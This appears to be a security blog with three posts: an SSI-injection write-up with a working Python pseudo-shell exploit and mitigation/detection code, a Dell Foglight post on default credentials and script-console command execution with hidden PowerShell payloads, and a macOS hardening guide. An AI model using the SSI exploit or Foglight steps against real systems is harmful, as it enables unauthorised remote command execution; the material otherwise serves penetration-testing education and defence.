Exploiting Server Side Include Injection


Recently I was performing a penetration test and came across a Server Side Include (SSI) injection bug.  If you are familiar with cross-site scripting (XSS), this type of vulnerability will sound familiar.  It is caused by an application taking input from the user and supplying it in the response from the server.  The mitigations are the same as for XSS: sanitize/encode data before returning it, and consider using white-listed values.

Where this differs from XSS is that in the case of SSI injection, the user-supplied data doesn’t just end up in the HTML returned to the user; it ends up being evaluated by the server itself.  Here is some code similar to what I had found:

First the $name parameter was populated by a POST variable supplied by the user:

$name = $_POST['name'];

Further down in the code, the value the user provided is reflected back within the application response.

<input name="name" value="<?php if (isset($name)) { echo $name; } ?>">

Likely the developer did this because they wanted to refill the form for the user if they made a mistake and needed to resubmit the form.

The Apache documentation on SSI shows how to use a server side include. Note the portion under executing commands:

“You can actually have SSI execute a command using the shell (/bin/sh, to be precise – or the DOS shell, if you’re on Win32).”

The syntax is simple:

<!--#exec cmd="COMMAND" -->

If we were to supply something similar within the name parameter, our server side include would be executed and then be returned in the response.

In the default configuration, web servers won’t have SSI enabled, or won’t allow the exec command.  Some applications have a legitimate need for SSI, and developers/admins will enable this functionality.

Here is some PoC code to exploit this issue:

import requests                                           # HTTP client library
while True:                                               # loop until interrupted (Ctrl-C)
    cmd = input('shell> ')                                # command string to send
    payload = "MAGIC<!--#exec cmd='%s' -->MAGIC" % (cmd)  # SSI exec directive wrapped in delimiters
    r = requests.post("URL", data={"name": payload})      # reflected via the vulnerable "name" parameter
    delimiter = 'MAGIC'
    output = r.text.split(delimiter, 2)[1]                # text between the delimiters is the command output
    print(output)
  1. Import the requests library to interact via HTTP
  2. Start an infinite loop
  3. Take in a string to be executed as a command
  4. Craft the payload.  This is an include tag that will exec the supplied string from line 3
  5. Send the payload in an HTTP POST within the “name” parameter
  6. Define the delimiter.  This will be used to identify the command output within the response
  7. Split the response and set the “output” variable to only contain the command output
  8. Print the output to the screen

This creates a type of “pseudo-shell” that we can use to interact with the web server.  We won’t be able to do anything interactive or change directories, but we can send any OS command to the server and receive the output.
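As an added example (not code from the original post), here is the same reflection in Python beside the two mitigations the post names, output encoding and an allow-list, plus a check that flags request parameters carrying SSI directives so they can be logged or rejected before they reach a template. The parameter values are constructed samples.

```python
import html
import re

# Constructed sample request parameters: "name" has the shape of the
# payload discussed above, the other two are ordinary form input.
SAMPLE_PARAMS = {
    "name": "MAGIC<!--#exec cmd='id' -->MAGIC",
    "city": "Bob O'Neil <bob@example.com>",
    "note": "hello",
}

# Every SSI directive opens with the exact prefix "<!--#" followed by a
# directive keyword; anything else is an ordinary HTML comment.
SSI_DIRECTIVE = re.compile(
    r"<!--#(exec|include|echo|set|config|printenv|fsize|flastmod|if|elif|else|endif)\b",
    re.IGNORECASE,
)

# Allow-list for a person's name: letters (incl. Latin-1/Latin Extended-A),
# spaces, apostrophes, hyphens and periods, at most 64 characters.
NAME_ALLOWED = re.compile(r"[A-Za-z\u00C0-\u017F .'-]{1,64}")


def render_unsafe(name):
    """Same defect as the PHP snippet above: the raw value lands in the page."""
    return '<input name="name" value="%s">' % name


def render_safe(name):
    """Hardened form: HTML-encode before reflecting. quote=True also encodes
    the quote characters, so the value cannot break out of the attribute."""
    return '<input name="name" value="%s">' % html.escape(name, quote=True)


def is_allowed_name(name):
    """Stricter alternative: reject anything outside the allow-listed characters."""
    return NAME_ALLOWED.fullmatch(name) is not None


def has_ssi_directive(value):
    """True if the value contains something an SSI parser would act on."""
    return SSI_DIRECTIVE.search(value) is not None


def flag_ssi_params(params):
    """Return the names of request parameters whose values contain SSI directives."""
    return sorted(k for k, v in params.items() if has_ssi_directive(v))


if __name__ == "__main__":
    hostile = SAMPLE_PARAMS["name"]
    print(render_unsafe(hostile))   # directive survives intact
    print(render_safe(hostile))     # "<" becomes "&lt;", nothing for SSI to evaluate
    print(flag_ssi_params(SAMPLE_PARAMS))
```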


Exploiting an unsecured Dell Foglight server

 

Dell Foglight for Virtualization is an infrastructure performance monitoring tool that can also be used to manage systems.  It comes configured with a default username and password of “foglight”.

It is possible to execute code on the host itself through an integrated scripting console.

By browsing to Homes -> Administration

And then browsing to Investigate -> Data -> Script Console

Under the “Scripts” tab, click the [+] Add button.

From here you can enter any groovy code and execute it on the host.  A simple way to execute commands is by using:

"cmd.exe /c ".execute

or

"powershell.exe -NoP -NonI -W Hidden -Enc".execute

This is a good place to swap in your Powershell Empire or Metasploit Web Delivery stage 0 payload.

Foglight also has the ability to execute code on the devices which it manages.

By browsing to Homes -> Automation

And then browsing to the Workflow Management tab and clicking the [+] New button.

When within the Workflow Studio click All ActionPacks -> Common -> Scripting

Here you will see a few choices:

  • Run PowerShell Script
  • Send and Run Command(s)
  • Send and Run PowerShell script

I was not able to create a functional workflow; however, with this it is likely possible to push a malicious workflow to all managed devices.

One other notable feature of Foglight is that it stores credentials.

By browsing to Dashboards -> Administration -> Credentials

and then clicking Manage Credentials.

According to the Foglight UI, “A lockbox contains a collection of encrypted credentials and the keys for their encryption and decryption.” While there does not seem to be a way to extract the credential plaintext through the UI, it is likely possible to recover and decrypt these stored credentials once the host is compromised.


Securing a default installation of MacOS

 

This was originally written as the basis for a GIAC Gold paper.  Ultimately, it was not unique enough to warrant a research paper, but it provides an overview of the security features of MacOS.

 

As of mid 2016, MacOS captures nearly 10% of the global market for desktop PC software.  While Apple computers have long had the reputation of being more secure than the more popular Windows operating system, they are also susceptible to many of the same attack vectors.  MacOS comes with a number of strong built-in security features, and users can further improve the security of their device through configuration changes as well as the use of security software.  In this post we will explain some of the security features built into MacOS and how to configure them properly, and provide information about additional software that can improve the security posture of the system.

1.   Introduction

Security of endpoint workstations is essential.  Threats include remote exploits against running services, malware infections via the web or email, and physical attacks against the system.  By securing workstations we reduce the likelihood that sensitive data can be obtained by unauthorized third parties, and avoid the time spent eradicating malware, restoring from system backups, or reinstalling operating systems and applications (NIST, 2016).

A wide variety of threats exist against a system running MacOS.  The first is local threats, which require physical access to the system.  Aside from physical controls, software-based controls can be used to mitigate these attacks.  Using firmware passwords as well as encrypting the hard drive can prevent access to the data even if the hard drive is removed from the system.  Physical attackers could also exploit a workstation if it is left unattended and unlocked.  Passwords should be used to authenticate to a workstation, and the password should be strong (NIST, 2016).

Remote threats target services that are running on the system.  Services that do not require authentication or fail to use encryption are desirable targets for attackers.  This can be mitigated by removing unused or vulnerable services and staying up to date on security patches.  Using a firewall can also reduce the attack surface, rendering vulnerable services inaccessible to a remote attacker (NIST, 2016).

Malicious payloads can find their way onto a system through a number of different vectors, including web browsing, email, and removable media.  By using low-privileged accounts for daily work, we can reduce the damage from a malware infection.  Anti-virus can quarantine known malicious payloads before they are given the opportunity to execute (NIST, 2016).

This paper provides information on securing an installation of MacOS.  By implementing these recommendations, users will be able to better secure their systems and the systems within their respective organizations.  While each environment will have unique requirements, this should serve as a guideline.  Some of these suggestions may remove functionality that is desired or required; the acceptable tradeoff between security and functionality is to be determined by the reader.

2.   Built-in Security Controls

2.1.      Software Updates

With the release of MacOS Sierra, Apple brought in a number of new security updates.  Apple helps users keep up to date with the latest software by sending notifications whenever new updates are available; they can then be downloaded with a click of a button.  This helps users quickly bring their software up to the latest version.

To configure the App Store to check for updates automatically, go to System Preferences, click on App Store, and ensure that “Automatically check for updates” is selected.

It is important to patch quickly.  After a vulnerability is discovered, it is usually patched quickly, but this does no good if the patch is not applied.  Public exploits tend to become available not long after a patch is released (Levin, 2016).

2.2.      Gatekeeper

Gatekeeper was first introduced in OS X Lion and is used to enforce code signing, which reduces the likelihood of running an application containing malware.  By default, MacOS will only run applications downloaded from the Mac App Store and applications signed with a valid developer ID.  It can also be configured to only allow applications from the App Store, or alternatively to allow unsigned applications (NIST, 2016).

2.3.      XProtect

Apple’s built-in anti-malware protection is known as XProtect.  It first became available in OS X Snow Leopard.  When a file is downloaded by a quarantine-aware application such as a web browser or an instant messenger, a quarantine bit is set, and the file is compared against the list of known malware signatures in /System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/XProtect.plist.  If there is a match, you will receive a warning message.  The definitions are silently updated and enabled by default.  XProtect doesn’t contain any advanced heuristics, but it should be left on as it protects against common strains of malware (Hoffman, 2015).

2.4.      FileVault

MacOS also comes with an encryption utility called FileVault. Since OS X Lion, the utility allows for full disk encryption. It can also be used to encrypt removable drives as well as Time Machine back-ups.

FileVault has no noticeable effect on performance.  If the device is ever compromised, it renders the data on the disk inaccessible to anyone without the key.  Apple explains this in their FileVault Best Practices whitepaper: “All computers have firmware of some type—EFI, BIOS—to help in the discovery of hardware components and ultimately to properly bootstrap the computer using the desired OS instance. In the case of Apple hardware and the use of EFI, Apple stores relevant information within EFI to aid in the functionality of OS X. For example, the FileVault key is stored in EFI to transparently come out of standby mode.” (Apple, 2012)

It is possible that the decryption key could be recovered if the system is left in standby mode.  During standby the key resides in memory, and if the RAM were dumped the key could be extracted.  The key can be destroyed on entering standby to mitigate this attack vector.  One option is to enforce hibernation, which evicts the FileVault keys from memory.  You can also have them removed in standby mode using the pmset utility via the following command:

pmset destroyfvkeyonstandby 1

2.5.      Firewall

MacOS also comes with a built-in firewall.  By default, it is not enabled, although MacOS does not come configured with many listening services.  With the firewall enabled, users have the ability to block all incoming connections, or to configure incoming connections on a per-app basis.  By default, signed applications will be able to receive incoming connections.  There is also the option of “stealth mode”, which ignores ICMP packets and will not provide a response (Hoffman, 2014).  It is recommended to block incoming connections unless there is a service running on the system that requires them.

2.6.      Keychain

MacOS also has built-in features for password management.  The primary way MacOS manages passwords is through the Keychain.  The Keychain is an app that can store passwords as well as account information.  It can also be used to manage certificates that are used to validate websites, digital documents, and other web-based material (Apple, 2016).  The keychain password is typically the same as the login password, but it can be set to a different one.  To reduce the likelihood of the keychain password being compromised, it should be set to something other than your login password.  By default, the keychain will not lock when your computer goes to sleep.  You can use the Keychain Access utility to make the keychain lock when sleeping and after a set number of minutes of inactivity (NIST, 2016).

2.7.      Sandboxing

Apple enforces sandboxing on applications that come from the Mac App Store.  This helps mitigate the effects of software flaws within apps that could otherwise compromise the host system.  While this reduces the functionality of certain apps (Martin, 2011), it offers tremendous security gains.  It is also possible to force any application to run in a sandbox using the sandbox-exec tool (Prandzioch, 2016).  To sandbox applications other than those from the App Store, I recommend using https://github.com/pansen/macos-sandbox-profiles.  While sandboxing is not always 100% effective (Core Security, 2011), it can reduce the harm from an exploited application.

2.8.      System Integrity Protection

Another security feature that first came to the Mac with OS X El Capitan is SIP (System Integrity Protection).  SIP, sometimes referred to as “rootless”, helps prevent potentially malicious software from modifying protected files.  It does this by restricting the permissions of the root user account: with SIP in place, only processes signed by Apple can modify these protected areas.  There are not many good reasons to disable SIP, and it is highly recommended to leave it on (Apple, 2016).

3.   Configuration

3.1.      User Account Management

MacOS allows users to automatically log in during start-up.  This should not be used.  If you enable automatic login, the keychain password is stored in /etc/kcpassword XOR’d with a known key, allowing anyone with access to the machine to recover the password plaintext (StackExchange, 2012).

On a fresh installation of MacOS, the first user account created is an administrative user account.  Administrative users are members of the admin group and have sudo permissions, enabling them to control other user accounts, including root.  Apple recommends the following when creating user accounts: “to reduce exposure to harmful apps or files, limit the number of administrator users you create. Consider creating a standard user for your daily work and use the administrator user only when you need to install software or administer users.” (Apple, 2016)

Apple also allows users to create a guest user.  The guest user exists so that friends and family can use the system without a password and without gaining access to the owner’s files.  This can be helpful to many, but it creates a certain level of risk: if there is an unpatched local privilege escalation exploit against MacOS, it may be exploitable via the guest user account.  For this reason the guest account should be disabled unless explicitly needed (NIST, 2016).

3.2.      Firmware Password

Enabling a firmware password can increase the security level of a MacOS system.  Firmware passwords are set in the logic board’s firmware.  It is an EFI password that can keep the Mac from being booted from an external boot volume or into single-user mode.  In the past, firmware passwords could usually be bypassed by removing the memory, but that is not the case here (Tanasi, 2017).  The firmware can also prevent direct memory access via interfaces like FireWire.  The firmware password stays with the host system, so removing the drive and bringing it to another system would not remove the password (Apple, 2012).  While this is a strong control, it is not completely immune from all attacks.  In 2016 a security researcher discovered a way to bypass some implementations by re-flashing the chip (osxreverser, 2016).  This does not recover the password, but would still grant access.  The only approved way to remove the firmware password without knowing it is by taking the system to an Apple retail store or an Apple authorized service provider (Apple, 2016).

3.3.      Bonjour

Bonjour is the name for Apple’s implementation of zero configuration networking.  It is used for service discovery, address assignment, and hostname resolution.  Because Bonjour advertises all the system’s capabilities, it provides information to attackers about what type of software is running on the system (Tanasi, 2016).  In a paper presented at the 2016 IEEE Symposium on Security and Privacy, a group of researchers identified a number of Apple services that use zero configuration frameworks and lack security in their implementation, such as Apple Handoff and AirDrop.  Because the zero configuration protocol has no means to validate identity, any service relying on it is vulnerable to MITM (Man in the Middle) attacks.  This would allow an attacker on the same network segment to intercept files being transferred (Bai, 2016).

3.4.      Disable sharing

On a new MacOS system, all sharing is disabled by default.  This is the most secure state.  If sharing is necessary, certain precautions should be taken.

3.4.1.   Screen Sharing and Remote Management

These two services allow remote control of the system, similar to popular screen sharing applications based on VNC.  Typically the only time this is needed is for remote support.  If it is needed, ensure that authentication is used with a strong password, and disable it when not in use (NIST, 2016).

3.4.2.   Remote Login

Remote Login controls access to both SSH and SFTP.  The protocols themselves are relatively secure, but unless needed, they should remain disabled.  For additional security, SSH can be configured to only allow key-based authentication by editing /etc/ssh_config and setting the following values (stackexchange, 2017):

PermitRootLogin no

PasswordAuthentication no

PermitEmptyPasswords no

ChallengeResponseAuthentication no
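As an added example (not from the original post), a small audit that parses sshd-style configuration text for the four directives above. It takes into account two sshd parsing rules that make a quick visual check unreliable: for each keyword sshd uses the first value it reads, so a later duplicate does not override an earlier one, and everything after a Match line applies only to matching connections rather than globally. The sample configuration is constructed; no file path is assumed.

```python
import re

# The hardening values listed above; keywords are compared case-insensitively
# because sshd treats them that way.
EXPECTED = {
    "permitrootlogin": "no",
    "passwordauthentication": "no",
    "permitemptypasswords": "no",
    "challengeresponseauthentication": "no",
}

# Constructed sample config. PasswordAuthentication appears twice: sshd keeps
# the FIRST value ("yes"), so the later "no" has no effect. PermitEmptyPasswords
# sits inside a Match block, so it is not a global setting.
SAMPLE_CONFIG = """\
# constructed sample, not a real host's configuration
Port 22
PasswordAuthentication yes
PermitRootLogin no
PasswordAuthentication no
ChallengeResponseAuthentication no
Match User backup
    PermitEmptyPasswords no
"""


def effective_global_settings(text):
    """Return {keyword: first value} for directives that precede any Match block."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # sshd accepts "Keyword value" or "Keyword=value" (optional spaces around "=").
        parts = re.split(r"\s*=\s*|\s+", line, maxsplit=1)
        if len(parts) != 2:
            continue
        key, value = parts[0].lower(), parts[1].strip()
        if key == "match":
            break                     # remaining lines are conditional, not global
        settings.setdefault(key, value)  # first value wins, later duplicates ignored
    return settings


def audit_sshd_config(text):
    """Return (directive, expected, actual) for every directive that is not
    explicitly set to the expected value; a missing directive is reported as
    None because the guidance above is to set each one explicitly."""
    settings = effective_global_settings(text)
    findings = []
    for key, want in EXPECTED.items():
        got = settings.get(key)
        if got is None or got.lower() != want:
            findings.append((key, want, got))
    return findings


if __name__ == "__main__":
    for directive, want, got in audit_sshd_config(SAMPLE_CONFIG):
        print("%s: expected %s, effective value %s" % (directive, want, got))
```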

 

References


About System Integrity Protection on your Mac. (2016, November 07). Retrieved January 14, 2017, from https://support.apple.com/en-us/HT204899

Osxreverser. (2016, June 25). Apple EFI firmware passwords and the SCBO myth. Retrieved January 14, 2017, from https://reverse.put.as/2016/06/25/apple-efi-firmware-passwords-and-the-scbo-myth/

Apple OS X Sandbox Predefined Profiles Bypass. (2011, November 10). Retrieved January 14, 2017, from https://www.coresecurity.com/content/apple-osx-sandbox-bypass

Atlas, K. (2016, October 06). OS X Config Check. Retrieved January 14, 2017, from https://github.com/kristovatlas/osx-config-check

Badger, L., Souppaya, M., Trapnell, M., Trapnell, E., Yaga, D., & Scarfone, K. (2016). Guide to securing Apple OS X 10.10 systems for IT professionals: a NIST security configuration checklist. NIST Special Publication (SP) 800 -179. doi:10.6028/nist.sp.800-179

Bai, X., Xing, L., Zhang, N., Wang, X., Liao, X., Li, T., & Hu, S. (2016). Staying Secure and Unprepared: Understanding and Mitigating the Security Risks of Apple ZeroConf. 2016 IEEE Symposium on Security and Privacy (SP). doi:10.1109/sp.2016.45

Best Practices for Deploying FileVault 2. (2012). Apple Technical White Paper. Retrieved January 14, 2017, from http://training.apple.com/pdf/WP_FileVault2.pdf

Bookwalter, J. (2016, November 22). Radio Silence 2 review: Set it and forget it Mac firewall for outgoing connections. Retrieved January 14, 2017, from http://www.macworld.com/article/3143072/security/radio-silence-2-review-set-it-and-forget-it-mac-firewall-for-outgoing-connections.html

Desktop OS market share 2012-2016. (n.d.). Retrieved January 14, 2017, from https://www.statista.com/statistics/218089/global-market-share-of-windows-7/

Does activating auto-login compromise secure password storage? (2012, May 7). Retrieved January 14, 2017, from http://apple.stackexchange.com/questions/50652/does-activating-auto-login-compromise-secure-password-storage

Hands Off! (n.d.). Retrieved January 14, 2017, from https://www.oneperiodic.com/products/handsoff/

Hoffman, C. (2014, December 20). Your Mac’s Firewall is Off By Default: Do You Need to Enable It? Retrieved January 14, 2017, from http://www.howtogeek.com/205108/your-mac%E2%80%99s-firewall-is-off-by-default-do-you-need-to-enable-it/

Hoffman, C. (2015, May 18). XProtect Explained: How Your Mac’s Built-in Anti-malware Software Works. Retrieved January 14, 2017, from http://www.howtogeek.com/217043/xprotect-explained-how-your-macs-built-in-anti-malware-works/

How to use SSH keys and disable password authentication (2016, Jan 27). Retrieved January 22 2017, from http://apple.stackexchange.com/questions/225231/how-to-use-ssh-keys-and-disable-password-authentication

Kessler, T. (2014, December 17). The four Mac security options everyone should know. Retrieved January 14, 2017, from http://www.macworld.com/article/2855020/the-four-mac-security-options-everyone-should-know.html

Keychain Access: Keychain Access overview. (2016, May 4). Retrieved January 14, 2017, from https://support.apple.com/kb/PH20093?locale=en_US

Levin, J. (2016). MacOS and iOS Internals (Vol. 3, Security & Insecurity ). New York, NY: Technologeeks Press.

MacOS Security and Privacy Guide. (2017, January 02). Retrieved January 14, 2017, from https://github.com/drduh/macOS-Security-and-Privacy-Guide

Martin, D. W. (2011, November 7). OS X Lion Sandboxing Is A Killjoy Destined To Ruin Our Mac Experience. Retrieved January 14, 2017, from http://www.cultofmac.com/113977/os-x-lion-sandboxing-is-a-killjoy-destined-to-ruin-our-mac-experience/

Norvell, P. (2002). Improving the Security of a Default Install of Mac OS X. SANS Institute InfoSec Reading Room. Retrieved January 14, 2017, from https://www.sans.org/reading-room/whitepapers/apple/improving-security-default-install-mac-os-v101-240.

Piper, S. (2016, September 11). OS X Lockdown. Retrieved January 14, 2017, from https://github.com/SummitRoute/osxlockdown

Prandzioch, D. (2016, April 11). OS X: Run any command in a sandbox. Retrieved January 14, 2017, from https://www.davd.eu/os-x-run-any-command-in-a-sandbox/

Set your Mac to automatically log in during startup. (2016, December 06). Retrieved January 14, 2017, from https://support.apple.com/en-us/HT201476

Singh, S. (2013, August 30). Mac OSX-STIG. Retrieved January 14, 2017, from https://github.com/find-evil/Mac-OSX-STIG

Tanasi, A. (2016). MacOS 10.12 Sierra. Retrieved January 14, 2017, from http://docs.hardentheworld.org/OS/MacOS_10.12_Sierra/index.html

Use a firmware password on your Mac. (2016, March 22). Retrieved January 14, 2017, from https://support.apple.com/en-us/HT204455

Wardle, P. (2015). BlockBlock. Retrieved January 14, 2017, from https://objective-see.com/products/blockblock.html

Ways to avoid harmful software. (2016). Retrieved January 14, 2017, from https://help.apple.com/machelp/mac/10.12/index.html#/mh11389